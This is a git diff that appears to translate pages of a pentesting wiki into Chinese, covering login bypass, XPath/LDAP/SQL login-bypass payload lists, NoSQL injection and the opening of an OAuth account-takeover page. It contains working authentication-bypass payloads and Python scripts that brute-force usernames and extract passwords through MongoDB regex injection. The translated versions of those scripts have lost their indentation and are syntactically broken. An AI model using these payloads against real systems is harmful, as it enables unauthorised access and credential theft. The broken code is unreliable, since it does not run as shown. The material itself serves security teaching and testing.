+### 更多有效载荷
 
 {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
 
 <figure><img src="../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！** (_需要流利的波兰语书写和口语能力_)。
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md
index 4795c3cb4..ea785887e 100644
--- a/src/pentesting-web/login-bypass/README.md
+++ b/src/pentesting-web/login-bypass/README.md
@@ -1,54 +1,53 @@
-# Login Bypass
+# 登录绕过
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的活动之一。该大会的 **使命是促进技术知识**，是各个学科技术和网络安全专业人士的热烈交流平台。
 
 {% embed url="https://www.rootedcon.com/" %}
 
-## **Bypass regular login**
+## **绕过常规登录**
 
-If you find a login page, here you can find some techniques to try to bypass it:
+如果你发现了登录页面，这里有一些可以尝试绕过它的技术：
 
-- Check for **comments** inside the page (scroll down and to the right?)
-- Check if you can **directly access the restricted pages**
-- Check to **not send the parameters** (do not send any or only 1)
-- Check the **PHP comparisons error:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
-- **Change content type to json** and send json values (bool true included)
-  - If you get a response saying that POST is not supported you can try to send the **JSON in the body but with a GET request** with `Content-Type: application/json`
-- Check nodejs potential parsing error (read [**this**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
-  - Nodejs will transform that payload to a query similar to the following one: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` which makes the password bit to be always true.
-  - If you can send a JSON object you can send `"password":{"password": 1}` to bypass the login.
-  - Remember that to bypass this login you still need to **know and send a valid username**.
-  - **Adding `"stringifyObjects":true`** option when calling `mysql.createConnection` will eventually b**lock all unexpected behaviours when `Object` is passed** in the parameter.
-- Check credentials:
-  - [**Default credentials**](../../generic-hacking/brute-force.md#default-credentials) of the technology/platform used
-  - **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
-  - Create a dictionary using **Cewl**, **add** the **default** username and password (if there is) and try to brute-force it using all the words as **usernames and password**
-  - **Brute-force** using a bigger **dictionary (**[**Brute force**](../../generic-hacking/brute-force.md#http-post-form)**)**
+- 检查页面内的 **评论**（向下滚动并向右？）
+- 检查是否可以 **直接访问受限页面**
+- 检查 **不发送参数**（不发送任何或仅发送 1 个）
+- 检查 **PHP 比较错误：** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
+- **将内容类型更改为 json** 并发送 json 值（包括 bool true）
+- 如果你收到一条消息说不支持 POST，你可以尝试以 **GET 请求发送 JSON 到主体**，并设置 `Content-Type: application/json`
+- 检查 nodejs 潜在的解析错误（阅读 [**这篇文章**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)）： `password[password]=1`
+- Nodejs 会将该有效负载转换为类似以下的查询： ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` 这使得密码部分始终为真。
+- 如果你可以发送 JSON 对象，你可以发送 `"password":{"password": 1}` 来绕过登录。
+- 记住，要绕过此登录，你仍然需要 **知道并发送有效的用户名**。
+- **在调用 `mysql.createConnection` 时添加 `"stringifyObjects":true`** 选项将最终 **阻止在参数中传递 `Object` 时的所有意外行为**。
+- 检查凭据：
+- [**默认凭据**](../../generic-hacking/brute-force.md#default-credentials) 的技术/平台
+- **常见组合**（root，admin，password，技术名称，带有这些密码之一的默认用户）。
+- 使用 **Cewl** 创建字典，**添加** 默认用户名和密码（如果有），并尝试使用所有单词作为 **用户名和密码** 进行暴力破解
+- **暴力破解** 使用更大的 **字典 (**[**暴力破解**](../../generic-hacking/brute-force.md#http-post-form)**)**
 
-### SQL Injection authentication bypass
+### SQL 注入认证绕过
 
-[Here you can find several tricks to bypass the login via **SQL injections**](../sql-injection/#authentication-bypass).
+[这里你可以找到几种通过 **SQL 注入** 绕过登录的技巧](../sql-injection/#authentication-bypass)。
 
-In the following page you can find a **custom list to try to bypass login** via SQL Injections:
+在以下页面中，你可以找到一个 **自定义列表以尝试通过 SQL 注入绕过登录**：
 
 {{#ref}}
 sql-login-bypass.md
 {{#endref}}
 
-### No SQL Injection authentication bypass
+### 无 SQL 注入认证绕过
 
-[Here you can find several tricks to bypass the login via **No SQL Injections**](../nosql-injection.md#basic-authentication-bypass)**.**
+[这里你可以找到几种通过 **无 SQL 注入** 绕过登录的技巧](../nosql-injection.md#basic-authentication-bypass)**。**
 
-As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
+由于无 SQL 注入需要更改参数值，你需要手动测试它们。
 
-### XPath Injection authentication bypass
-
-[Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)
+### XPath 注入认证绕过
 
+[这里你可以找到几种通过 **XPath 注入** 绕过登录的技巧](../xpath-injection.md#authentication-bypass)
 ```
 ' or '1'='1
 ' or ''='
@@ -64,11 +63,9 @@ As the NoSQL Injections requires to change the parameters value, you will need t
 admin' or '
 admin' or '1'='2
 ```
+### LDAP 注入认证绕过
 
-### LDAP Injection authentication bypass
-
-[Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)
-
+[在这里你可以找到几种通过 **LDAP 注入** 绕过登录的技巧。](../ldap-injection.md#login-bypass)
 ```
 *
 *)(&
@@ -82,29 +79,27 @@ admin)(!(&(|
 pwd))
 admin))(|(|
 ```
+### 记住我
 
-### Remember Me
+如果页面有 "**记住我**" 功能，检查它是如何实现的，看看你是否可以利用它来 **接管其他账户**。
 
-If the page has "**Remember Me**" functionality check how is it implemented and see if you can abuse it to **takeover other accounts**.
+### 重定向
 
-### Redirects
+页面通常在登录后会重定向用户，检查你是否可以更改该重定向以造成 [**开放重定向**](../open-redirect.md)。如果你将用户重定向到你的网站，可能会窃取一些信息（代码、cookies...）。
 
-Pages usually redirects users after login, check if you can alter that redirect to cause an [**Open Redirect**](../open-redirect.md). Maybe you can steal some information (codes, cookies...) if you redirect the user to your web.
+## 其他检查
 
-## Other Checks
+- 检查你是否可以通过登录功能 **枚举用户名**。
+- 检查密码/**敏感**信息 **表单** **输入** 中是否激活了 **自动完成**：`<input autocomplete="false">`
 
-- Check if you can **enumerate usernames** abusing the login functionality.
-- Check if **auto-complete** is active in the password/**sensitive** information **forms** **input:** `<input autocomplete="false"`
-
-## Automatic Tools
+## 自动工具
 
 - [HTLogin](https://github.com/akinerkisa/HTLogin)
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**，是各个学科技术和网络安全专业人士的一个热烈交流点。
 
 {% embed url="https://www.rootedcon.com/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/login-bypass/sql-login-bypass.md b/src/pentesting-web/login-bypass/sql-login-bypass.md
index 1c22b7e31..976a030af 100644
--- a/src/pentesting-web/login-bypass/sql-login-bypass.md
+++ b/src/pentesting-web/login-bypass/sql-login-bypass.md
@@ -2,16 +2,15 @@
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-This list contains **payloads to bypass the login via XPath, LDAP and SQL injection**(in that order).
-
-The way to use this list is to put the **first 200 lines as the username and password.** Then, put the complete list in the username first and then in the password inputs while putting some password (like _Pass1234._) or some known username (like _admin_).
+此列表包含**通过XPath、LDAP和SQL注入绕过登录的有效载荷**（按此顺序）。
 
+使用此列表的方法是将**前200行作为用户名和密码。** 然后，将完整列表放在用户名输入框中，然后在密码输入框中放入一些密码（如 _Pass1234._）或一些已知用户名（如 _admin_）。
 ```
 admin
 password
@@ -818,14 +817,12 @@ Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
 %8C%A8%27)||1-- 2
 %bf')||1-- 2
 ```
-
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md
index a0678235b..dcf316e99 100644
--- a/src/pentesting-web/nosql-injection.md
+++ b/src/pentesting-web/nosql-injection.md
@@ -1,21 +1,20 @@
-# NoSQL injection
+# NoSQL 注入
 
 <figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Exploit
+## 利用
 
-In PHP you can send an Array changing the sent parameter from _parameter=foo_ to _parameter\[arrName]=foo._
-
-The exploits are based in adding an **Operator**:
+在 PHP 中，您可以通过将发送的参数从 _parameter=foo_ 更改为 _parameter\[arrName]=foo._ 来发送一个数组。
 
+这些利用基于添加一个 **运算符**：
 ```bash
 username[$ne]=1$password[$ne]=1 #<Not Equals>
 username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
@@ -26,11 +25,9 @@ username[$ne]=admin&pass[$gt]=s #<Greater Than>
 username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
 { $where: "this.credits == this.debits" }#<IF>, can be used to execute code
 ```
+### 基本认证绕过
 
-### Basic authentication bypass
-
-**Using not equal ($ne) or greater ($gt)**
-
+**使用不等于 ($ne) 或大于 ($gt)**
 ```bash
 #in URL
 username[$ne]=toto&password[$ne]=toto
@@ -42,30 +39,22 @@ username[$exists]=true&password[$exists]=true
 {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
 {"username": {"$gt": undefined}, "password": {"$gt": undefined} }
 ```
-
 ### **SQL - Mongo**
-
 ```javascript
 query = { $where: `this.username == '${username}'` }
 ```
-
-An attacker can exploit this by inputting strings like `admin' || 'a'=='a`, making the query return all documents by satisfying the condition with a tautology (`'a'=='a'`). This is analogous to SQL injection attacks where inputs like `' or 1=1-- -` are used to manipulate SQL queries. In MongoDB, similar injections can be done using inputs like `' || 1==1//`, `' || 1==1%00`, or `admin' || 'a'=='a`.
-
+攻击者可以通过输入字符串如 `admin' || 'a'=='a` 来利用这一点，使查询返回所有文档，因为满足了一个恒真条件 (`'a'=='a'`)。这类似于 SQL 注入攻击，其中使用像 `' or 1=1-- -` 的输入来操纵 SQL 查询。在 MongoDB 中，可以使用类似的注入，通过输入如 `' || 1==1//`、`' || 1==1%00` 或 `admin' || 'a'=='a`。
 ```
 Normal sql: ' or 1=1-- -
 Mongo sql: ' || 1==1//    or    ' || 1==1%00     or    admin' || 'a'=='a
 ```
-
-### Extract **length** information
-
+### 提取 **长度** 信息
 ```bash
 username[$ne]=toto&password[$regex]=.{1}
 username[$ne]=toto&password[$regex]=.{3}
 # True if the length equals 1,3...
 ```
-
-### Extract **data** information
-
+### 提取 **数据** 信息
 ```
 in URL (if length == 3)
 username[$ne]=toto&password[$regex]=a.{2}
@@ -83,9 +72,7 @@ in JSON
 {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
 {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
 ```
-
 ### **SQL - Mongo**
-
 ```
 /?search=admin' && this.password%00 --> Check if the field password exists
 /?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
@@ -97,55 +84,49 @@ in JSON
 ...
 /?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00  Found
 ```
+### PHP 任意函数执行
 
-### PHP Arbitrary Function Execution
-
-Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) library (used by default) it might be possible to execute and arbitrary function as in [this report](https://swarm.ptsecurity.com/rce-cockpit-cms/).
-
+使用默认使用的 [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) 库的 **$func** 操作符，可能会执行任意函数，如 [此报告](https://swarm.ptsecurity.com/rce-cockpit-cms/) 中所示。
 ```python
 "user":{"$func": "var_dump"}
 ```
-
 ![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png](<../images/image (933).png>)
 
-### Get info from different collection
+### 从不同集合获取信息
 
-It's possible to use [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) to get info from a different collection. In the following example, we are reading from a **different collection** called **`users`** and getting the **results of all the entries** with a password matching a wildcard.
-
-**NOTE:** `$lookup` and other aggregation functions are only available if the `aggregate()` function was used to perform the search instead of the more common `find()` or `findOne()` functions.
+可以使用 [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) 从不同集合获取信息。在以下示例中，我们从一个名为 **`users`** 的 **不同集合** 中读取，并获取 **所有条目** 的 **结果**，这些条目的密码与通配符匹配。
 
+**注意：** 只有在使用 `aggregate()` 函数进行搜索时，`$lookup` 和其他聚合函数才可用，而不是更常见的 `find()` 或 `findOne()` 函数。
 ```json
 [
-  {
-    "$lookup": {
-      "from": "users",
-      "as": "resultado",
-      "pipeline": [
-        {
-          "$match": {
-            "password": {
-              "$regex": "^.*"
-            }
-          }
-        }
-      ]
-    }
-  }
+{
+"$lookup": {
+"from": "users",
+"as": "resultado",
+"pipeline": [
+{
+"$match": {
+"password": {
+"$regex": "^.*"
+}
+}
+}
+]
+}
+}
 ]
 ```
-
 <figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
 
 ## MongoDB Payloads
 
-List [from here](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
-
+列表 [从这里](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
 ```
 true, $where: '1 == 1'
 , $where: '1 == 1'
@@ -175,9 +156,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 {"username": {"$gt":""}, "password": {"$gt":""}}
 {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
 ```
-
-## Blind NoSQL Script
-
+## 盲目 NoSQL 脚本
 ```python
 import requests, string
 
@@ -185,13 +164,13 @@ alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@
 
 flag = ""
 for i in range(21):
-    print("[i] Looking for char number "+str(i+1))
-    for char in alphabet:
-        r = requests.get("http://chall.com?param=^"+flag+char)
-        if ("<TRUE>" in r.text):
-            flag += char
-            print("[+] Flag: "+flag)
-            break
+print("[i] Looking for char number "+str(i+1))
+for char in alphabet:
+r = requests.get("http://chall.com?param=^"+flag+char)
+if ("<TRUE>" in r.text):
+flag += char
+print("[+] Flag: "+flag)
+break
 ```
 
 ```python
@@ -205,19 +184,17 @@ username="admin"
 password=""
 
 while True:
-    for c in string.printable:
-        if c not in ['*','+','.','?','|']:
-            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
-            r = requests.post(u, data = {'ids': payload}, verify = False)
-            if 'OK' in r.text:
-                print("Found one more char : %s" % (password+c))
-                password += c
+for c in string.printable:
+if c not in ['*','+','.','?','|']:
+payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
+r = requests.post(u, data = {'ids': payload}, verify = False)
+if 'OK' in r.text:
+print("Found one more char : %s" % (password+c))
+password += c
 ```
+### 从POST登录进行暴力破解登录用户名和密码
 
-### Brute-force login usernames and passwords from POST login
-
-This is a simple script that you could modify but the previous tools can also do this task.
-
+这是一个简单的脚本，您可以对其进行修改，但之前的工具也可以完成此任务。
 ```python
 import requests
 import string
@@ -227,43 +204,42 @@ headers = {"Host": "exmaple.com"}
 cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
 possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
 def get_password(username):
-    print("Extracting password of "+username)
-    params = {"username":username, "password[$regex]":"", "login": "login"}
-    password = "^"
-    while True:
-        for c in possible_chars:
-            params["password[$regex]"] = password + c + ".*"
-            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
-            if int(pr.status_code) == 302:
-                password += c
-                break
-        if c == possible_chars[-1]:
-            print("Found password "+password[1:].replace("\\", "")+" for username "+username)
-            return password[1:].replace("\\", "")
+print("Extracting password of "+username)
+params = {"username":username, "password[$regex]":"", "login": "login"}
+password = "^"
+while True:
+for c in possible_chars:
+params["password[$regex]"] = password + c + ".*"
+pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
+if int(pr.status_code) == 302:
+password += c
+break
+if c == possible_chars[-1]:
+print("Found password "+password[1:].replace("\\", "")+" for username "+username)
+return password[1:].replace("\\", "")
 
 def get_usernames(prefix):
-    usernames = []
-    params = {"username[$regex]":"", "password[$regex]":".*"}
-    for c in possible_chars:
-        username = "^" + prefix + c
-        params["username[$regex]"] = username + ".*"
-        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
-        if int(pr.status_code) == 302:
-            print(username)
-            for user in get_usernames(prefix + c):
-                usernames.append(user)
-    return usernames
+usernames = []
+params = {"username[$regex]":"", "password[$regex]":".*"}
+for c in possible_chars:
+username = "^" + prefix + c
+params["username[$regex]"] = username + ".*"
+pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
+if int(pr.status_code) == 302:
+print(username)
+for user in get_usernames(prefix + c):
+usernames.append(user)
+return usernames
 
 for u in get_usernames(""):
-    get_password(u)
+get_password(u)
 ```
-
-## Tools
+## 工具
 
 - [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
 - [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)
 
-## References
+## 参考资料
 
 - [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
@@ -275,8 +251,7 @@ for u in get_usernames(""):
 <figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
-
diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md
index 6a38d254b..7cc48238e 100644
--- a/src/pentesting-web/oauth-to-account-takeover.md
+++ b/src/pentesting-web/oauth-to-account-takeover.md
@@ -1,4 +1,4 @@
-# OAuth to Account takeover
+# OAuth 到账户接管
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -6,36 +6,35 @@
 
 {% embed url="https://websec.nl/" %}
 
-## Basic Information <a href="#d4a8" id="d4a8"></a>
+## 基本信息 <a href="#d4a8" id="d4a8"></a>
 
-OAuth offers various versions, with foundational insights accessible at [OAuth 2.0 documentation](https://oauth.net/2/). This discussion primarily centers on the widely used [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/), providing an **authorization framework that enables an application to access or perform actions on a user's account in another application** (the authorization server).
+OAuth 提供了多个版本，基础信息可在 [OAuth 2.0 documentation](https://oauth.net/2/) 中获取。本讨论主要集中在广泛使用的 [OAuth 2.0 授权码授权类型](https://oauth.net/2/grant-types/authorization-code/)，提供一个 **授权框架，使应用程序能够访问或在另一个应用程序中执行用户账户的操作**（授权服务器）。
 
-Consider a hypothetical website _**https://example.com**_, designed to **showcase all your social media posts**, including private ones. To achieve this, OAuth 2.0 is employed. _https://example.com_ will request your permission to **access your social media posts**. Consequently, a consent screen will appear on _https://socialmedia.com_, outlining the **permissions being requested and the developer making the request**. Upon your authorization, _https://example.com_ gains the ability to **access your posts on your behalf**.
+考虑一个假设的网站 _**https://example.com**_，旨在 **展示您所有的社交媒体帖子**，包括私人帖子。为此，使用了 OAuth 2.0。_https://example.com_ 将请求您 **访问您的社交媒体帖子** 的权限。因此，_https://socialmedia.com_ 上会出现一个同意屏幕，概述 **请求的权限和发起请求的开发者**。在您授权后，_https://example.com_ 获得 **代表您访问您的帖子** 的能力。
 
-It's essential to grasp the following components within the OAuth 2.0 framework:
+理解 OAuth 2.0 框架中的以下组件至关重要：
 
-- **resource owner**: You, as the **user/entity**, authorize access to your resource, like your social media account posts.
-- **resource server**: The **server managing authenticated requests** after the application has secured an `access token` on behalf of the `resource owner`, e.g., **https://socialmedia.com**.
-- **client application**: The **application seeking authorization** from the `resource owner`, such as **https://example.com**.
-- **authorization server**: The **server that issues `access tokens`** to the `client application` following the successful authentication of the `resource owner` and securing authorization, e.g., **https://socialmedia.com**.
-- **client_id**: A public, unique identifier for the application.
-- **client_secret:** A confidential key, known solely to the application and the authorization server, used for generating `access_tokens`.
-- **response_type**: A value specifying **the type of token requested**, like `code`.
-- **scope**: The **level of access** the `client application` is requesting from the `resource owner`.
-- **redirect_uri**: The **URL to which the user is redirected after authorization**. This typically must align with the pre-registered redirect URL.
-- **state**: A parameter to **maintain data across the user's redirection to and from the authorization server**. Its uniqueness is critical for serving as a **CSRF protection mechanism**.
-- **grant_type**: A parameter indicating **the grant type and the type of token to be returned**.
-- **code**: The authorization code from the `authorization server`, used in tandem with `client_id` and `client_secret` by the client application to acquire an `access_token`.
-- **access_token**: The **token that the client application uses for API requests** on behalf of the `resource owner`.
-- **refresh_token**: Enables the application to **obtain a new `access_token` without re-prompting the user**.
+- **资源拥有者**：您，作为 **用户/实体**，授权访问您的资源，例如您的社交媒体账户帖子。
+- **资源服务器**：在应用程序为 `资源拥有者` 获取 `access token` 后，**管理经过身份验证请求的服务器**，例如 **https://socialmedia.com**。
+- **客户端应用程序**：**请求 `资源拥有者` 授权的应用程序**，例如 **https://example.com**。
+- **授权服务器**：在成功验证 `资源拥有者` 并获得授权后，**向 `客户端应用程序` 发放 `access tokens` 的服务器**，例如 **https://socialmedia.com**。
+- **client_id**：应用程序的公共唯一标识符。
+- **client_secret**：仅为应用程序和授权服务器所知的机密密钥，用于生成 `access_tokens`。
+- **response_type**：指定 **请求的令牌类型** 的值，例如 `code`。
+- **scope**：`客户端应用程序` 请求的 **访问级别**。
+- **redirect_uri**：用户在授权后被重定向的 **URL**。这通常必须与预注册的重定向 URL 对齐。
+- **state**：一个参数，用于 **在用户重定向到授权服务器及返回时维护数据**。其唯一性对于作为 **CSRF 保护机制** 至关重要。
+- **grant_type**：指示 **授权类型和要返回的令牌类型** 的参数。
+- **code**：来自 `授权服务器` 的授权码，客户端应用程序与 `client_id` 和 `client_secret` 一起使用以获取 `access_token`。
+- **access_token**：客户端应用程序代表 `资源拥有者` 用于 API 请求的 **令牌**。
+- **refresh_token**：使应用程序能够 **在不重新提示用户的情况下获取新的 `access_token`**。
 
-### Flow
+### 流程
 
-The **actual OAuth flow** proceeds as follows:
-
-1. You navigate to [https://example.com](https://example.com) and select the “Integrate with Social Media” button.
-2. The site then sends a request to [https://socialmedia.com](https://socialmedia.com) asking for your authorization to let https://example.com’s application access your posts. The request is structured as:
+**实际的 OAuth 流程** 如下：
 
+1. 您导航到 [https://example.com](https://example.com) 并选择“与社交媒体集成”按钮。
+2. 然后该网站向 [https://socialmedia.com](https://socialmedia.com) 发送请求，请求您的授权以让 https://example.com 的应用程序访问您的帖子。请求结构如下：
 ```
 https://socialmedia.com/auth
 ?response_type=code
@@ -44,70 +43,62 @@ https://socialmedia.com/auth
 &scope=readPosts
 &state=randomString123
 ```
-
-3. You are then presented with a consent page.
-4. Following your approval, Social Media sends a response to the `redirect_uri` with the `code` and `state` parameters:
-
+3. 然后您将看到一个同意页面。  
+4. 在您批准后，社交媒体会将带有 `code` 和 `state` 参数的响应发送到 `redirect_uri`：
 ```
 https://example.com?code=uniqueCode123&state=randomString123
 ```
-
-5. https://example.com utilizes this `code`, together with its `client_id` and `client_secret`, to make a server-side request to obtain an `access_token` on your behalf, enabling access to the permissions you consented to:
-
+5. https://example.com 利用这个 `code`，连同它的 `client_id` 和 `client_secret`，向服务器发起请求以代表您获取 `access_token`，从而访问您同意的权限：
 ```
 POST /oauth/access_token
 Host: socialmedia.com
 ...{"client_id": "example_clientId", "client_secret": "example_clientSecret", "code": "uniqueCode123", "grant_type": "authorization_code"}
 ```
+6. 最后，过程结束时 https://example.com 使用您的 `access_token` 进行 API 调用以访问
 
-6. Finally, the process concludes as https://example.com employs your `access_token` to make an API call to Social Media to access
+## 漏洞 <a href="#id-323a" id="id-323a"></a>
 
-## Vulnerabilities <a href="#id-323a" id="id-323a"></a>
+### 开放的 redirect_uri <a href="#cc36" id="cc36"></a>
 
-### Open redirect_uri <a href="#cc36" id="cc36"></a>
